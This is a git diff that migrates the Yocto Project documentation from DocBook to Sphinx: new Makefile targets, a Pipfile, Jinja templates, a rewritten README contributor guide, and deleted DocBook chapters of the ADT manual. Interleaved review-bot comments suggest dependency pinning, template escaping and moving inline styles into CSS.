-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-
-endif
-
-ifeq ($(DOC),ref-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = ref-manual.html ref-style.css figures/poky-title.png \
- figures/build-workspace-directory.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),sdk-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = sdk-manual.html sdk-style.css figures/sdk-title.png \
- figures/sdk-environment.png figures/sdk-installed-standard-sdk-directory.png \
- figures/sdk-installed-extensible-sdk-directory.png figures/sdk-devtool-add-flow.png \
- figures/sdk-devtool-modify-flow.png \
- figures/sdk-devtool-upgrade-flow.png figures/sdk-autotools-flow.png figures/sdk-makefile-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),profile-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = profile-manual.html profile-manual-style.css \
- figures/profile-title.png figures/kernelshark-all.png \
- figures/kernelshark-choose-events.png \
- figures/kernelshark-i915-display.png \
- figures/kernelshark-output-display.png \
- figures/oprofileui-busybox.png figures/oprofileui-copy-to-user.png \
- figures/oprofileui-downloading.png figures/oprofileui-processes.png \
- figures/perf-probe-do_fork-profile.png \
- figures/perf-report-cycles-u.png \
- figures/perf-systemwide.png figures/perf-systemwide-libc.png \
- figures/perf-wget-busybox-annotate-menu.png \
- figures/perf-wget-busybox-annotate-udhcpc.png \
- figures/perf-wget-busybox-debuginfo.png \
- figures/perf-wget-busybox-dso-zoom.png \
- figures/perf-wget-busybox-dso-zoom-menu.png \
- figures/perf-wget-busybox-expanded-stripped.png \
- figures/perf-wget-flat-stripped.png \
- figures/perf-wget-g-copy-from-user-expanded-stripped.png \
- figures/perf-wget-g-copy-to-user-expanded-debuginfo.png \
- figures/perf-wget-g-copy-to-user-expanded-stripped.png \
- figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png \
- figures/pybootchartgui-linux-yocto.png \
- figures/pychart-linux-yocto-rpm.png \
- figures/pychart-linux-yocto-rpm-nostrip.png \
- figures/sched-wakeup-profile.png figures/sysprof-callers.png \
- figures/sysprof-copy-from-user.png figures/sysprof-copy-to-user.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),kernel-dev)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = kernel-dev.html kernel-dev-style.css \
- figures/kernel-dev-title.png figures/kernel-overview-2-generic.png \
- figures/kernel-architecture-overview.png figures/kernel-dev-flow.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-ifeq ($(DOC),toaster-manual)
-XSLTOPTS = --xinclude
-ALLPREQ = html tarball
-TARFILES = toaster-manual.html toaster-manual-style.css \
- figures/toaster-title.png figures/simple-configuration.png \
- figures/hosted-service.png \
- figures/compatible-layers.png figures/import-layer.png figures/new-project.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
-endif
-
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your locally installed XSL stylesheets.
-XSL_BASE_URI = http://docbook.sourceforge.net/release/xsl/1.76.1
-XSL_XHTML_URI = $(XSL_BASE_URI)/xhtml/docbook.xsl
-
-all: $(ALLPREQ)
-
-pdf:
-ifeq ($(DOC),brief-yoctoprojectqs)
- @echo " "
- @echo "ERROR: You cannot generate a PDF file for brief-yoctoprojectqs."
- @echo " "
-
-else ifeq ($(DOC),mega-manual)
- @echo " "
- @echo "ERROR: You cannot generate a mega-manual PDF file."
- @echo " "
-
-else
-
- cd $(DOC); ../tools/poky-docbook-to-pdf $(DOC).xml ../template; cd ..
-endif
-
-html:
-ifeq ($(DOC),mega-manual)
-# See http://www.sagehill.net/docbookxsl/HtmlOutput.html
- @echo " "
- @echo "******** Building "$(DOC)
- @echo " "
- cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
- @echo " "
- @echo "******** Using mega-manual.sed to process external links"
- @echo " "
- cd $(DOC); sed -f ../tools/mega-manual.sed < mega-manual.html > mega-output.html; cd ..
- @echo " "
- @echo "******** Cleaning up transient file mega-output.html"
- @echo " "
- cd $(DOC); rm mega-manual.html; mv mega-output.html mega-manual.html; cd ..
-else
-# See http://www.sagehill.net/docbookxsl/HtmlOutput.html
- @echo " "
- @echo "******** Building "$(DOC)
- @echo " "
- cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
-endif
-
-
-tarball: html
- @echo " "
- @echo "******** Creating Tarball of document files"
- @echo " "
- cd $(DOC); tar -cvzf $(DOC).tgz $(TARFILES); cd ..
-
-validate:
- cd $(DOC); xmllint --postvalid --xinclude --noout $(DOC).xml; cd ..
-
-
-publish:
- @if test -f $(DOC)/$(DOC).html; \
- then \
- echo " "; \
- echo "******** Publishing "$(DOC)".html"; \
- echo " "; \
- scp -r $(MANUALS) $(STYLESHEET) www.yoctoproject.org:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
- cd $(DOC); scp -r $(FIGURES) www.yoctoproject.org:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
- else \
- echo " "; \
- echo $(DOC)".html missing. Generate the file first then try again."; \
- echo " "; \
- fi
+publish: Makefile html singlehtml
+ rm -rf $(BUILDDIR)/$(DESTDIR)/
+ mkdir -p $(BUILDDIR)/$(DESTDIR)/
+ cp -r $(BUILDDIR)/html/* $(BUILDDIR)/$(DESTDIR)/
+ cp $(BUILDDIR)/singlehtml/index.html $(BUILDDIR)/$(DESTDIR)/singleindex.html
+ sed -i -e 's@index.html#@singleindex.html#@g' $(BUILDDIR)/$(DESTDIR)/singleindex.html
clean:
- rm -rf $(MANUALS); rm $(DOC)/$(DOC).tgz;
+ @rm -rf $(BUILDDIR)
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+ @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
diff --git a/documentation/Pipfile b/documentation/Pipfile
new file mode 100644
index 0000000000..7ee1d22905
--- /dev/null
+++ b/documentation/Pipfile
@@ -0,0 +1,14 @@
+[[source]]
+name = "pypi"
+url = "https://pypi.org/simple"
+verify_ssl = true
+
+[dev-packages]
+
+[packages]
+sphinx = "*"
+sphinx-rtd-theme = "*"
+pyyaml = "*"
+
+[requires]
+python_version = "3"
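Review bot: The three entries under `[packages]` are all `"*"`, so each `pipenv install` pulls whichever sphinx, sphinx-rtd-theme and pyyaml releases are current on PyPI. The build that follows runs those packages, plus the project's own Sphinx extensions, as Python code. No `Pipfile.lock` is visible in this part of the commit; committing one and installing with `pipenv sync` would make the documentation build reproducible and hash-checked. If a lock file is not wanted, bounded specifiers such as `sphinx = "==<tested-version>"` (placeholder value) would at least stop an unexpected major release from changing or breaking the published output.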
diff --git a/documentation/README b/documentation/README
index d64f2fd2f9..28d5c4be8e 100644
--- a/documentation/README
+++ b/documentation/README
@@ -34,22 +34,17 @@ Manual Organization
Folders exist for individual manuals as follows:
-* sdk-manual - The Yocto Project Software Development Kit (SDK) Developer's Guide.
-* bsp-guide - The Yocto Project Board Support Package (BSP) Developer's Guide
-* dev-manual - The Yocto Project Development Tasks Manual
-* kernel-dev - The Yocto Project Linux Kernel Development Tasks Manual
-* ref-manual - The Yocto Project Reference Manual
-* yocto-project-qs - The Yocto Project Quick Start
-* mega-manual - The Yocto Project Mega-Manual, which is an aggregated manual comprised
- of all YP manuals and guides
-* profile-manual - The Yocto Project Profile and Tracing Manual
-* toaster-manual - The Toaster Manual
-
-Each folder is self-contained regarding content and figures. Note that there
-is a sed file needed to process the links of the mega-manual. The sed file
-is located in the tools directory. Also note that the figures folder in the
-mega-manual directory contains duplicates of all the figures in the YP folders
-directories for all YP manuals and guides.
+* sdk-manual - The Yocto Project Software Development Kit (SDK) Developer's Guide.
+* bsp-guide - The Yocto Project Board Support Package (BSP) Developer's Guide
+* dev-manual - The Yocto Project Development Tasks Manual
+* kernel-dev - The Yocto Project Linux Kernel Development Tasks Manual
+* ref-manual - The Yocto Project Reference Manual
+* brief-yoctoprojectqs - The Yocto Project Quick Start
+* profile-manual - The Yocto Project Profile and Tracing Manual
+* toaster-manual - The Toaster Manual
+* test-manual - The Test Environment Manual
+
+Each folder is self-contained regarding content and figures.
If you want to find HTML versions of the Yocto Project manuals on the web,
go to http://www.yoctoproject.org and click on the "Documentation" tab. From
@@ -60,34 +55,273 @@ currently being developed.
In general, the Yocto Project site (http://www.yoctoproject.org) is a great
reference for both information and downloads.
-Makefile
+poky.yaml
+=========
+
+This file defines variables used for documentation production. The variables
+are used to define release pathnames, URLs for the published manuals, etc.
+
+template
========
+Contains various templates, fonts, and some old PNG files.
+
+Sphinx
+======
+
+The Yocto Project documentation was migrated from the original DocBook
+format to Sphinx based documentation for the Yocto Project 3.2
+release. This section will provide additional information related to
+the Sphinx migration, and guidelines for developers willing to
+contribute to the Yocto Project documentation.
+
+ Sphinx is a tool that makes it easy to create intelligent and
+ beautiful documentation, written by Georg Brandl and licensed under
+ the BSD license. It was originally created for the Python
+ documentation.
+
+Extensive documentation is available on the Sphinx website:
+https://www.sphinx-doc.org/en/master/. Sphinx is designed to be
+extensible thanks to the ability to write our own custom extensions,
+as Python modules, which will be executed during the generation of the
+documentation.
+
+Yocto Project documentation website
+===================================
+
+A new website has been created to host the Yocto Project
+documentation, it can be found at: https://docs.yoctoproject.org/.
+
+The entire Yocto Project documentation, as well as the BitBake manual
+is published on this website, including all previously released
+versions. A version switcher was added, as a drop-down menu on the top
+of the page to switch back and forth between the various versions of
+the current active Yocto Project releases.
+
+Transition pages have been added (as rst file) to show links to old
+versions of the Yocto Project documentation with links to each manual
+generated with DocBook.
+
+How to build the Yocto Project documentation
+============================================
+
+Sphinx is written in Python. While it might work with Python2, for
+obvious reasons, we will only support building the Yocto Project
+documentation with Python3.
+
+Sphinx might be available in your Linux distro packages repositories,
+however it is not recommend using distro packages, as they might be
+old versions, especially if you are using an LTS version of your
+distro. The recommended method to install Sphinx and all required
+dependencies is to use the Python Package Index (pip).
-The Makefile processes manual directories to create HTML, PDF,
-tarballs, etc. Details on how the Makefile work are documented
-inside the Makefile. See that file for more information.
+To install all required packages run:
-To build a manual, you run the make command and pass it the name
-of the folder containing the manual's contents.
-For example, the following command run from the documentation directory
-creates an HTML version of the SDK manual.
-The DOC variable specifies the manual you are making:
+ $ pip3 install sphinx sphinx_rtd_theme pyyaml
- $ make DOC=sdk-manual
+To build the documentation locally, run:
-poky.ent
+ $ cd documentation
+ $ make html
+
+The resulting HTML index page will be _build/html/index.html, and you
+can browse your own copy of the locally generated documentation with
+your browser.
+
+Alternatively, you can use Pipenv to automatically install all required
+dependencies in a virtual environment:
+
+ $ cd documentation
+ $ pipenv install
+ $ pipenv run make html
+
+Sphinx theme and CSS customization
+==================================
+
+The Yocto Project documentation is currently based on the "Read the
+Docs" Sphinx theme, with a few changes to make sure the look and feel
+of the project documentation is preserved.
+
+Most of the theme changes can be done using the file
+'sphinx-static/theme_overrides.css'. Most CSS changes in this file
+were inherited from the DocBook CSS stylesheets.
+
+Sphinx design guidelines and principles
+=======================================
+
+The initial Docbook to Sphinx migration was done with an automated
+tool called Pandoc (https://pandoc.org/). The tool produced some clean
+output markdown text files. After the initial automated conversion
+additional changes were done to fix up headings, images and links. In
+addition Sphinx has built in mechanisms (directives) which were used
+to replace similar functions implemented in Docbook such as glossary,
+variables substitutions, notes and references.
+
+Headings
========
-This file defines variables used for documentation production. The variables
-are used to define release pathnames, URLs for the published manuals, etc.
+The layout of the Yocto Project manuals is organized as follows
-template
+ Book
+ Chapter
+ Section
+ Section
+ Section
+
+The following headings styles are defined in Sphinx:
+
+ Book => overline ===
+ Chapter => overline ***
+ Section => ====
+ Section => ----
+ Section => ^^^^
+ Section => """" or ~~~~
+
+With this proposal, we preserve the same TOCs between Sphinx and Docbook.
+
+Built-in glossary
+=================
+
+Sphinx has a glossary directive. From
+https://www.sphinx-doc.org/en/master/usage/restructuredtext/directives.html#glossary:
+
+ This directive must contain a reST definition list with terms and
+ definitions. The definitions will then be referencable with the
+ [https://www.sphinx-doc.org/en/master/usage/restructuredtext/roles.html#role-term
+ 'term' role].
+
+So anywhere in any of the Yocto Project manuals, :term:`VAR` can be
+used to refer to an item from the glossary, and a link is created
+automatically. A general index of terms is also generated by Sphinx
+automatically.
+
+Global substitutions
+====================
+
+The Yocto Project documentation makes heavy use of global
+variables. In Docbook these variables are stored in the file
+poky.ent. This Docbook feature is not handled automatically with
+Pandoc. Sphinx has builtin support for substitutions
+(https://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html#substitutions),
+however there are important shortcomings. For example they cannot be
+used/nested inside code-block sections.
+
+A Sphinx extension was implemented to support variable substitutions
+to mimic the DocBook based documentation behavior. Variabes
+substitutions are done while reading/parsing the .rst files. The
+pattern for variables substitutions is the same as with DocBook,
+e.g. `&VAR;`.
+
+The implementation of the extension can be found here in the file
+documentation/sphinx/yocto-vars.py, this extension is enabled by
+default when building the Yocto Project documentation. All variables
+are set in a file call poky.yaml, which was initially generated from
+poky.ent. The file was converted into YAML so that it is easier to
+process by the custom Sphinx extension (which is a Python module).
+
+For example, the following .rst content will produce the 'expected'
+content:
+
+ .. code-block::
+ $ mkdir ~/poky-&DISTRO;
+ or
+ $ git clone &YOCTO_GIT_URL;/git/poky -b &DISTRO_NAME_NO_CAP;
+
+Variables can be nested, like it was the case for DocBook:
+
+ YOCTO_HOME_URL : "http://www.yoctoproject.org"
+ YOCTO_DOCS_URL : "&YOCTO_HOME_URL;/docs"
+
+Note directive
+==============
+
+Sphinx has a builtin 'note' directive that produces clean Note section
+in the output file. There are various types of directives such as
+"attention", "caution", "danger", "error", "hint", "important", "tip",
+"warning", "admonition" that are supported, and additional directive
+can be added as Sphinx extension if needed.
+
+Figures
+=======
+
+The Yocto Project documentation has many figures/images. Sphinx has a
+'figure' directive which is straight forward to use. To include a
+figure in the body of the documentation:
+
+ .. image:: figures/YP-flow-diagram.png
+
+Links and References
+====================
+
+The following types of links can be used: links to other locations in
+the same document, to locations in other documents and to external
+websites.
+
+More information can be found here:
+https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html.
+
+References
+==========
+
+The following extension is enabed by default:
+sphinx.ext.autosectionlabel
+(https://www.sphinx-doc.org/en/master/usage/extensions/autosectionlabel.html).
+
+This extension allows you to refer sections by their titles. Note that
+autosectionlabel_prefix_document is enabled by default, so that we can
+insert references from any document.
+
+For example, to insert an HTML link to a section from
+documentaion/manual/intro.rst, use:
+
+ Please check this :ref:`manual/intro:Cross-References to Locations in the Same Document`
+
+Alternatively a custom text can be used instead of using the section
+text:
+
+ Please check this :ref:`section <manual/intro:Cross-References to Locations in the Same Document>`
+
+TIP: The following command can be used to dump all the references that
+ are defined in the project documentation:
+
+ python -msphinx.ext.intersphinx <path to build folder>/html/objects.inv
+
+This dump contains all links and for each link it shows the default
+"Link Text" that Sphinx would use. If the default link text is not
+appropriate, a custom link text can be used in the ':ref:' directive.
+
+Extlinks
========
-Contains various templates, fonts, and some old PNG files.
-tools
-=====
-Contains a tool to convert the DocBook files to PDF format. This folder also
-contains the mega-manual.sed file, which is used by Makefile to process
-cross-references from within the manual that normally go to an external
-manual.
+The sphinx.ext.extlinks extension is enabled by default
+(https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html#use-the-external-links-extension),
+and it is configured with:
+
+ 'yocto_home': ('https://yoctoproject.org%s', None),
+ 'yocto_wiki': ('https://wiki.yoctoproject.org%s', None),
+ 'yocto_dl': ('https://downloads.yoctoproject.org%s', None),
+ 'yocto_lists': ('https://lists.yoctoproject.org%s', None),
+ 'yocto_bugs': ('https://bugzilla.yoctoproject.org%s', None),
+ 'yocto_ab': ('https://autobuilder.yoctoproject.org%s', None),
+ 'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+ 'yocto_git': ('https://git.yoctoproject.org%s', None),
+ 'oe_home': ('https://www.openembedded.org%s', None),
+ 'oe_lists': ('https://lists.openembedded.org%s', None),
+
+It creates convenient shortcuts which can be used throughout the
+documentation rst files, as:
+
+ Please check this :yocto_wiki:`wiki page </Weekly_Status>`
+
+Intersphinx links
+=================
+
+The sphinx.ext.intersphinx extension is enabled by default
+(https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html),
+so that we can cross reference content from other Sphinx based
+documentation projects, such as the BitBake manual.
+
+References to the bitbake manual can be done like this:
+
+ See the ":ref:`-D <bitbake:bitbake-user-manual/bitbake-user-manual-intro:usage and syntax>`" option
+or
+ :term:`bitbake:BB_NUMBER_PARSE_THREADS`
diff --git a/documentation/_templates/breadcrumbs.html b/documentation/_templates/breadcrumbs.html
new file mode 100644
index 0000000000..eb6244b74c
--- /dev/null
+++ b/documentation/_templates/breadcrumbs.html
@@ -0,0 +1,14 @@
+{% extends "!breadcrumbs.html" %}
+
+{% block breadcrumbs %}
+ <li>
+ <span class="doctype_switcher_placeholder">{{ doctype or 'single' }}</span>
+ <span class="version_switcher_placeholder">{{ release }}</span>
+ </li>
+ <li> &raquo;</li>
+ {% for doc in parents %}
+ <li><a href="{{ doc.link|e }}">{{ doc.title }}</a> &raquo;</li>
+ {% endfor %}
+ <li>{{ title }}</li>
+{% endblock %}
+
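Review bot: In the first `<li>`, `{{ doctype or 'single' }}` and `{{ release }}` are written without the `|e` filter that `doc.link` gets a few lines below, and as far as I know Sphinx's Jinja environment does not autoescape. Both look like plain-text build settings rather than rendered HTML (unlike `doc.title` and `title`, which have to stay unescaped), so `{{ release|e }}` and `{{ (doctype or 'single')|e }}` would cost nothing and keep a stray `<` or `&` in a version string out of the markup. A short Jinja comment such as `{# placeholder text; presumably replaced with drop-downs by the switcher script #}` would also tell the next reader why these two spans exist.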
diff --git a/documentation/_templates/footer.html b/documentation/_templates/footer.html
new file mode 100644
index 0000000000..508129ede4
--- /dev/null
+++ b/documentation/_templates/footer.html
@@ -0,0 +1,12 @@
+<footer>
+ <hr/>
+ <div role="contentinfo">
+ <p> A Linux Foundation Collaborative Project.
+ <br> All Rights Reserved. Linux Foundation&reg; and Yocto Project&reg; are registered trademarks of the Linux Foundation.
+ <br>Linux&reg; is a registered trademark of Linus Torvalds.
+ <br>&copy; Copyright {{ copyright }}
+ <br>Last updated on {{ last_updated }}
+ </p>
+ </div>
+</footer>
+
diff --git a/documentation/_templates/layout.html b/documentation/_templates/layout.html
new file mode 100644
index 0000000000..308d5c7a28
--- /dev/null
+++ b/documentation/_templates/layout.html
@@ -0,0 +1,7 @@
+{% extends "!layout.html" %}
+
+{% block extrabody %}
+<div id="outdated-warning" style="text-align: center; background-color: #FFBABA; color: #6A0E0E;">
+</div>
+{% endblock %}
+
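Review bot: The `outdated-warning` div carries its colours in an inline `style` attribute, bypassing `sphinx-static/theme_overrides.css`, which the README in this commit names as the place for theme changes. Inline styles would also be blocked if the docs site ever serves a Content-Security-Policy without `'unsafe-inline'` for styles. Moving the declarations to a rule like `#outdated-warning { text-align: center; background-color: #FFBABA; color: #6A0E0E; }` reduces the template to `<div id="outdated-warning"></div>`. The div is empty here, so whatever fills it lives outside this hunk; a one-line Jinja comment naming that script would help.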
diff --git a/documentation/adt-manual/adt-command.xml b/documentation/adt-manual/adt-command.xml
deleted file mode 100644
index c78d18a16d..0000000000
--- a/documentation/adt-manual/adt-command.xml
+++ /dev/null
@@ -1,265 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='using-the-command-line'>
-<title>Using the Command Line</title>
-
- <para>
- Recall that earlier the manual discussed how to use an existing toolchain
- tarball that had been installed into the default installation
- directory, <filename>/opt/poky/&DISTRO;</filename>, which is outside of the
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
- (see the section "<link linkend='using-an-existing-toolchain-tarball'>Using a Cross-Toolchain Tarball)</link>".
- And, that sourcing your architecture-specific environment setup script
- initializes a suitable cross-toolchain development environment.
- </para>
-
- <para>
- During this setup, locations for the compiler, QEMU scripts, QEMU binary,
- a special version of <filename>pkgconfig</filename> and other useful
- utilities are added to the <filename>PATH</filename> variable.
- Also, variables to assist
- <filename>pkgconfig</filename> and <filename>autotools</filename>
- are also defined so that, for example, <filename>configure.sh</filename>
- can find pre-generated test results for tests that need target hardware
- on which to run.
- You can see the
- "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
- section for the list of cross-toolchain environment variables
- established by the script.
- </para>
-
- <para>
- Collectively, these conditions allow you to easily use the toolchain
- outside of the OpenEmbedded build environment on both Autotools-based
- projects and Makefile-based projects.
- This chapter provides information for both these types of projects.
- </para>
-
-
-<section id='autotools-based-projects'>
-<title>Autotools-Based Projects</title>
-
- <para>
- Once you have a suitable cross-toolchain installed, it is very easy to
- develop a project outside of the OpenEmbedded build system.
- This section presents a simple "Helloworld" example that shows how
- to set up, compile, and run the project.
- </para>
-
- <section id='creating-and-running-a-project-based-on-gnu-autotools'>
- <title>Creating and Running a Project Based on GNU Autotools</title>
-
- <para>
- Follow these steps to create a simple Autotools-based project:
- <orderedlist>
- <listitem><para><emphasis>Create your directory:</emphasis>
- Create a clean directory for your project and then make
- that directory your working location:
- <literallayout class='monospaced'>
- $ mkdir $HOME/helloworld
- $ cd $HOME/helloworld
- </literallayout></para></listitem>
- <listitem><para><emphasis>Populate the directory:</emphasis>
- Create <filename>hello.c</filename>, <filename>Makefile.am</filename>,
- and <filename>configure.in</filename> files as follows:
- <itemizedlist>
- <listitem><para>For <filename>hello.c</filename>, include
- these lines:
- <literallayout class='monospaced'>
- #include &lt;stdio.h&gt;
-
- main()
- {
- printf("Hello World!\n");
- }
- </literallayout></para></listitem>
- <listitem><para>For <filename>Makefile.am</filename>,
- include these lines:
- <literallayout class='monospaced'>
- bin_PROGRAMS = hello
- hello_SOURCES = hello.c
- </literallayout></para></listitem>
- <listitem><para>For <filename>configure.in</filename>,
- include these lines:
- <literallayout class='monospaced'>
- AC_INIT(hello.c)
- AM_INIT_AUTOMAKE(hello,0.1)
- AC_PROG_CC
- AC_PROG_INSTALL
- AC_OUTPUT(Makefile)
- </literallayout></para></listitem>
- </itemizedlist></para></listitem>
- <listitem><para><emphasis>Source the cross-toolchain
- environment setup file:</emphasis>
- Installation of the cross-toolchain creates a cross-toolchain
- environment setup script in the directory that the ADT
- was installed.
- Before you can use the tools to develop your project, you must
- source this setup script.
- The script begins with the string "environment-setup" and contains
- the machine architecture, which is followed by the string
- "poky-linux".
- Here is an example that sources a script from the
- default ADT installation directory that uses the
- 32-bit Intel x86 Architecture and the
- &DISTRO_NAME; Yocto Project release:
- <literallayout class='monospaced'>
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- </literallayout></para></listitem>
- <listitem><para><emphasis>Generate the local aclocal.m4
- files and create the configure script:</emphasis>
- The following GNU Autotools generate the local
- <filename>aclocal.m4</filename> files and create the
- configure script:
- <literallayout class='monospaced'>
- $ aclocal
- $ autoconf
- </literallayout></para></listitem>
- <listitem><para><emphasis>Generate files needed by GNU
- coding standards:</emphasis>
- GNU coding standards require certain files in order for the
- project to be compliant.
- This command creates those files:
- <literallayout class='monospaced'>
- $ touch NEWS README AUTHORS ChangeLog
- </literallayout></para></listitem>
- <listitem><para><emphasis>Generate the configure
- file:</emphasis>
- This command generates the <filename>configure</filename>:
- <literallayout class='monospaced'>
- $ automake -a
- </literallayout></para></listitem>
- <listitem><para><emphasis>Cross-compile the project:</emphasis>
- This command compiles the project using the cross-compiler.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink>
- environment variable provides the minimal arguments for
- GNU configure:
- <literallayout class='monospaced'>
- $ ./configure ${CONFIGURE_FLAGS}
- </literallayout></para></listitem>
- <listitem><para><emphasis>Make and install the project:</emphasis>
- These two commands generate and install the project into the
- destination directory:
- <literallayout class='monospaced'>
- $ make
- $ make install DESTDIR=./tmp
- </literallayout></para></listitem>
- <listitem><para><emphasis>Verify the installation:</emphasis>
- This command is a simple way to verify the installation
- of your project.
- Running the command prints the architecture on which
- the binary file can run.
- This architecture should be the same architecture that
- the installed cross-toolchain supports.
- <literallayout class='monospaced'>
- $ file ./tmp/usr/local/bin/hello
- </literallayout></para></listitem>
- <listitem><para><emphasis>Execute your project:</emphasis>
- To execute the project in the shell, simply enter the name.
- You could also copy the binary to the actual target hardware
- and run the project there as well:
- <literallayout class='monospaced'>
- $ ./hello
- </literallayout>
- As expected, the project displays the "Hello World!" message.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='passing-host-options'>
- <title>Passing Host Options</title>
-
- <para>
- For an Autotools-based project, you can use the cross-toolchain by just
- passing the appropriate host option to <filename>configure.sh</filename>.
- The host option you use is derived from the name of the environment setup
- script found in the directory in which you installed the cross-toolchain.
- For example, the host option for an ARM-based target that uses the GNU EABI
- is <filename>armv5te-poky-linux-gnueabi</filename>.
- You will notice that the name of the script is
- <filename>environment-setup-armv5te-poky-linux-gnueabi</filename>.
- Thus, the following command works to update your project and
- rebuild it using the appropriate cross-toolchain tools:
- <literallayout class='monospaced'>
- $ ./configure --host=armv5te-poky-linux-gnueabi \
- --with-libtool-sysroot=<replaceable>sysroot_dir</replaceable>
- </literallayout>
- <note>
- If the <filename>configure</filename> script results in problems recognizing the
- <filename>--with-libtool-sysroot=</filename><replaceable>sysroot-dir</replaceable> option,
- regenerate the script to enable the support by doing the following and then
- run the script again:
- <literallayout class='monospaced'>
- $ libtoolize --automake
- $ aclocal -I ${OECORE_NATIVE_SYSROOT}/usr/share/aclocal \
- [-I <replaceable>dir_containing_your_project-specific_m4_macros</replaceable>]
- $ autoconf
- $ autoheader
- $ automake -a
- </literallayout>
- </note>
- </para>
- </section>
-</section>
-
-<section id='makefile-based-projects'>
-<title>Makefile-Based Projects</title>
-
- <para>
- For Makefile-based projects, the cross-toolchain environment variables
- established by running the cross-toolchain environment setup script
- are subject to general <filename>make</filename> rules.
- </para>
-
- <para>
- To illustrate this, consider the following four cross-toolchain
- environment variables:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'>CC</ulink>=i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/1.8/sysroots/i586-poky-linux
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'>LD</ulink>=i586-poky-linux-ld --sysroot=/opt/poky/1.8/sysroots/i586-poky-linux
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'>CFLAGS</ulink>=-O2 -pipe -g -feliminate-unused-debug-types
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CXXFLAGS'>CXXFLAGS</ulink>=-O2 -pipe -g -feliminate-unused-debug-types
- </literallayout>
- Now, consider the following three cases:
- <itemizedlist>
- <listitem><para><emphasis>Case 1 - No Variables Set in the <filename>Makefile</filename>:</emphasis>
- Because these variables are not specifically set in the
- <filename>Makefile</filename>, the variables retain their
- values based on the environment.
- </para></listitem>
- <listitem><para><emphasis>Case 2 - Variables Set in the <filename>Makefile</filename>:</emphasis>
- Specifically setting variables in the
- <filename>Makefile</filename> during the build results in the
- environment settings of the variables being overwritten.
- </para></listitem>
- <listitem><para><emphasis>Case 3 - Variables Set when the <filename>Makefile</filename> is Executed from the Command Line:</emphasis>
- Executing the <filename>Makefile</filename> from the command
- line results in the variables being overwritten with
- command-line content regardless of what is being set in the
- <filename>Makefile</filename>.
- In this case, environment variables are not considered unless
- you use the "-e" flag during the build:
- <literallayout class='monospaced'>
- $ make -e <replaceable>file</replaceable>
- </literallayout>
- If you use this flag, then the environment values of the
- variables override any variables specifically set in the
- <filename>Makefile</filename>.
- </para></listitem>
- </itemizedlist>
- <note>
- For the list of variables set up by the cross-toolchain environment
- setup script, see the
- "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
- section.
- </note>
- </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-intro.xml b/documentation/adt-manual/adt-intro.xml
deleted file mode 100644
index 597c7120ba..0000000000
--- a/documentation/adt-manual/adt-intro.xml
+++ /dev/null
@@ -1,180 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-intro'>
- <title>The Application Development Toolkit (ADT)</title>
-
- <para>
- Part of the Yocto Project development solution is an Application Development
- Toolkit (ADT).
- The ADT provides you with a custom-built, cross-development
- platform suited for developing a user-targeted product application.
- </para>
-
- <para>
- Fundamentally, the ADT consists of the following:
- <itemizedlist>
- <listitem><para>An architecture-specific cross-toolchain and matching
- sysroot both built by the
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- The toolchain and sysroot are based on a
- <ulink url='&YOCTO_DOCS_DEV_URL;#metadata'>Metadata</ulink>
- configuration and extensions,
